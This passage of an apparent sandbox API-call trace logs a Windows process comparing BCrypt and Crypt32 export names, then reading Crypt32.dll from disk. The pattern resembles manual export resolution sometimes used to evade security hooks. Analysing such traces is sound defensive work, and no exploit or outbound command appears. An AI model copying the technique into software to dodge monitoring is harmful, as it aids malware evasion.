(lpString1="BCryptDestroyKey", lpString2="BCryptAddContextFunction") returned 1 [0121.491] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0121.491] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0121.491] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptConfigureContext") returned 1 [0121.491] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptConfigureContextFunction") returned 1 [0121.491] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateContext") returned 1 [0121.491] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateHash") returned 1 [0121.491] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateMultiHash") returned 1 [0121.491] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDecrypt") returned 1 [0121.491] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeleteContext") returned 1 [0121.491] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKey") returned 1 [0121.491] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKeyCapi") returned 1 [0121.491] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0121.491] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDestroyHash") returned 1 [0121.491] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDestroyKey") returned 0 [0121.492] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptAddContextFunction") returned 1 [0121.492] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptAddContextFunctionProvider") returned 1 [0121.492] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0121.492] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptConfigureContext") returned 1 [0121.492] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptConfigureContextFunction") returned 1 [0121.492] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateContext") returned 1 [0121.492] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateHash") returned 1 [0121.492] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateMultiHash") returned 1 [0121.492] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDecrypt") returned 1 [0121.492] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeleteContext") returned 1 [0121.492] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKey") returned 1 [0121.492] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKeyCapi") returned 1 [0121.492] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0121.492] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroyHash") returned 1 [0121.492] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroyKey") returned 1 [0121.492] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroySecret") returned 0 [0121.492] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptAddContextFunction") returned 1 [0121.492] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0121.492] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0121.492] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptConfigureContext") returned 1 [0121.492] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptConfigureContextFunction") returned 1 [0121.492] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateContext") returned 1 [0121.492] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateHash") returned 1 [0121.492] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateMultiHash") returned 1 [0121.492] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDecrypt") returned 1 [0121.492] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeleteContext") returned 1 [0121.492] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKey") returned 1 [0121.492] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKeyCapi") returned 1 [0121.492] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0121.492] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroyHash") returned 1 [0121.492] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroyKey") returned 1 [0121.493] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroySecret") returned 1 [0121.493] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDuplicateHash") returned 0 [0121.493] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptAddContextFunction") returned 1 [0121.493] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0121.493] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0121.493] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptConfigureContext") returned 1 [0121.493] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptConfigureContextFunction") returned 1 [0121.493] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateContext") returned 1 [0121.493] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateHash") returned 1 [0121.493] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateMultiHash") returned 1 [0121.493] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDecrypt") returned 1 [0121.493] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeleteContext") returned 1 [0121.493] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKey") returned 1 [0121.493] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKeyCapi") returned 1 [0121.493] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0121.493] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroyHash") returned 1 [0121.493] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroyKey") returned 1 [0121.493] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroySecret") returned 1 [0121.493] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDuplicateHash") returned 1 [0121.493] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDuplicateKey") returned 0 [0121.493] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptAddContextFunction") returned 1 [0121.493] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptAddContextFunctionProvider") returned 1 [0121.493] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0121.493] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptConfigureContext") returned 1 [0121.493] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptConfigureContextFunction") returned 1 [0121.493] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateContext") returned 1 [0121.493] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateHash") returned 1 [0121.493] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateMultiHash") returned 1 [0121.494] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDecrypt") returned 1 [0121.494] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeleteContext") returned 1 [0121.494] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKey") returned 1 [0121.494] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKeyCapi") returned 1 [0121.494] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0121.494] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroyHash") returned 1 [0121.494] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroyKey") returned 1 [0121.494] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroySecret") returned 1 [0121.494] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDuplicateHash") returned 1 [0121.494] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDuplicateKey") returned 1 [0121.494] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptEncrypt") returned 0 [0121.494] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptAddContextFunction") returned 1 [0121.494] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptAddContextFunctionProvider") returned 1 [0121.494] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0121.494] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptConfigureContext") returned 1 [0121.494] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptConfigureContextFunction") returned 1 [0121.494] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateContext") returned 1 [0121.494] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateHash") returned 1 [0121.494] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateMultiHash") returned 1 [0121.494] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDecrypt") returned 1 [0121.494] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeleteContext") returned 1 [0121.494] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKey") returned 1 [0121.494] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKeyCapi") returned 1 [0121.494] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0121.494] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroyHash") returned 1 [0121.494] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroyKey") returned 1 [0121.494] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDestroySecret") returned 1 [0121.494] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDuplicateHash") returned 1 [0121.494] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDuplicateKey") returned 1 [0121.494] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptEncrypt") returned 1 [0121.494] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptEnumAlgorithms") returned 0 [0121.495] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptAddContextFunction") returned 1 [0121.495] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptAddContextFunctionProvider") returned 1 [0121.495] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0121.495] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptConfigureContext") returned 1 [0121.495] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptConfigureContextFunction") returned 1 [0121.495] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateContext") returned 1 [0121.495] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateHash") returned 1 [0121.495] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptCreateMultiHash") returned 1 [0121.495] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDecrypt") returned 1 [0121.495] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeleteContext") returned 1 [0121.495] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKey") returned 1 [0121.495] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKeyCapi") returned 1 [0121.495] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0121.495] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroyHash") returned 1 [0121.495] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroyKey") returned 1 [0121.495] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDestroySecret") returned 1 [0121.495] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDuplicateHash") returned 1 [0121.495] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptDuplicateKey") returned 1 [0121.495] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEncrypt") returned 1 [0121.495] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEnumAlgorithms") returned 1 [0121.495] lstrcmpA (lpString1="BCryptEnumContextFunctionProviders", lpString2="BCryptEnumContextFunctionProviders") returned 0 [0121.495] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptAddContextFunction") returned 1 [0121.495] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptAddContextFunctionProvider") returned 1 [0121.495] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0121.495] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptConfigureContext") returned 1 [0121.495] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptConfigureContextFunction") returned 1 [0121.495] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateContext") returned 1 [0121.495] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateHash") returned 1 [0121.496] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptCreateMultiHash") returned 1 [0121.496] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDecrypt") returned 1 [0121.496] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeleteContext") returned 1 [0121.496] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKey") returned 1 [0121.496] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKeyCapi") returned 1 [0121.496] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0121.496] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroyHash") returned 1 [0121.496] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroyKey") returned 1 [0121.496] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDestroySecret") returned 1 [0121.496] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDuplicateHash") returned 1 [0121.496] lstrcmpA (lpString1="BCryptEnumContextFunctions", lpString2="BCryptDuplicateKey") returned 1 [0121.497] GetProcessHeap () returned 0x480000 [0121.497] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x2cb2010 | out: hHeap=0x480000) returned 1 [0121.497] GetProcessHeap () returned 0x480000 [0121.497] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x10) returned 0x499060 [0121.498] LoadLibraryA (lpLibFileName="Crypt32.dll") returned 0x7ffc5c190000 [0121.761] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0121.761] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0121.761] GetModuleFileNameA (in: hModule=0x7ffc5c190000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")) returned 0x1f [0121.761] CreateFileA (lpFileName="C:\\Windows\\system32\\Crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0121.762] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0121.762] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0121.762] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1847520) returned 1 [0121.762] GetProcessHeap () returned 0x480000 [0121.762] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x1c30e0) returned 0x4070040 [0121.830] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0121.830] ReadFile (in: hFile=0x160, lpBuffer=0x4070040, nNumberOfBytesToRead=0x1c30e0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4070040*, lpNumberOfBytesRead=0x14f5a4*=0x1c30e0, lpOverlapped=0x0) returned 1 [0122.121] CloseHandle (hObject=0x160) returned 1 [0122.122] lstrcmpA (lpString1="CertAddCRLContextToStore", lpString2="CertAddCRLContextToStore") returned 0 [0122.122] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertAddCRLContextToStore") returned 1 [0122.122] lstrcmpA (lpString1="CertAddCRLLinkToStore", lpString2="CertAddCRLLinkToStore") returned 0 [0122.122] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCRLContextToStore") returned 1 [0122.122] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0122.122] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCTLContextToStore") returned 0 [0122.122] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCRLContextToStore") returned 1 [0122.122] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0122.122] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCTLContextToStore") returned 1 [0122.122] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCTLLinkToStore") returned 0 [0122.122] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCRLContextToStore") returned -1 [0122.122] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCRLLinkToStore") returned -1 [0122.122] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCTLContextToStore") returned -1 [0122.122] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCTLLinkToStore") returned -1 [0122.122] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCertificateContextToStore") returned 0 [0122.122] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCRLContextToStore") returned -1 [0122.122] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCRLLinkToStore") returned -1 [0122.122] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCTLContextToStore") returned -1 [0122.122] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCTLLinkToStore") returned -1 [0122.122] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0122.122] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCertificateLinkToStore") returned 0 [0122.122] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCRLContextToStore") returned 1 [0122.123] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0122.123] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCTLContextToStore") returned 1 [0122.123] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0122.123] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0122.123] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0122.123] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddEncodedCRLToStore") returned 0 [0122.123] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCRLContextToStore") returned 1 [0122.123] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0122.123] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCTLContextToStore") returned 1 [0122.123] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0122.123] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0122.123] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0122.123] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0122.123] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddEncodedCTLToStore") returned 0 [0122.123] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCRLContextToStore") returned 1 [0122.123] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0122.123] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCTLContextToStore") returned 1 [0122.123] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0122.123] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0122.123] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0122.124] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCRLToStore") returned -1 [0122.124] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCTLToStore") returned -1 [0122.124] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCertificateToStore") returned 0 [0122.124] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCRLContextToStore") returned 1 [0122.124] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCRLLinkToStore") returned 1 [0122.124] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCTLContextToStore") returned 1 [0122.124] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCTLLinkToStore") returned 1 [0122.124] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCertificateContextToStore") returned 1 [0122.124] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCertificateLinkToStore") returned 1 [0122.124] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCRLToStore") returned -1 [0122.124] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCTLToStore") returned -1 [0122.124] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCertificateToStore") returned 1 [0122.124] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 0 [0122.124] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCRLContextToStore") returned 1 [0122.124] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCRLLinkToStore") returned 1 [0122.124] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCTLContextToStore") returned 1 [0122.124] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCTLLinkToStore") returned 1 [0122.124] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCertificateContextToStore") returned 1 [0122.124] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCertificateLinkToStore") returned 1 [0122.124] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCRLToStore") returned -1 [0122.124] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCTLToStore") returned -1 [0122.125] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToStore") returned 1 [0122.125] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0122.125] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 0 [0122.125] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCRLContextToStore") returned 1 [0122.125] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCRLLinkToStore") returned 1 [0122.125] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCTLContextToStore") returned 1 [0122.125] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCTLLinkToStore") returned 1 [0122.125] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCertificateContextToStore") returned 1 [0122.125] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCertificateLinkToStore") returned 1 [0122.125] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCRLToStore") returned 1 [0122.125] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCTLToStore") returned 1 [0122.125] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToStore") returned 1 [0122.125] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0122.125] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0122.125] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 0 [0122.125] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCRLContextToStore") returned 1 [0122.125] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCRLLinkToStore") returned 1 [0122.125] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCTLContextToStore") returned 1 [0122.125] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCTLLinkToStore") returned 1 [0122.125] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCertificateContextToStore") returned 1 [0122.125] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCertificateLinkToStore") returned 1 [0122.126] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCRLToStore") returned 1 [0122.126] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCTLToStore") returned 1 [0122.126] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToStore") returned 1 [0122.126] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0122.126] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0122.126] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0122.126] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddRefServerOcspResponse") returned 0 [0122.126] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCRLContextToStore") returned 1 [0122.126] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCRLLinkToStore") returned 1 [0122.126] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCTLContextToStore") returned 1 [0122.126] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCTLLinkToStore") returned 1 [0122.126] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCertificateContextToStore") returned 1 [0122.126] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCertificateLinkToStore") returned 1 [0122.126] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCRLToStore") returned 1 [0122.126] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCTLToStore") returned 1 [0122.126] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", 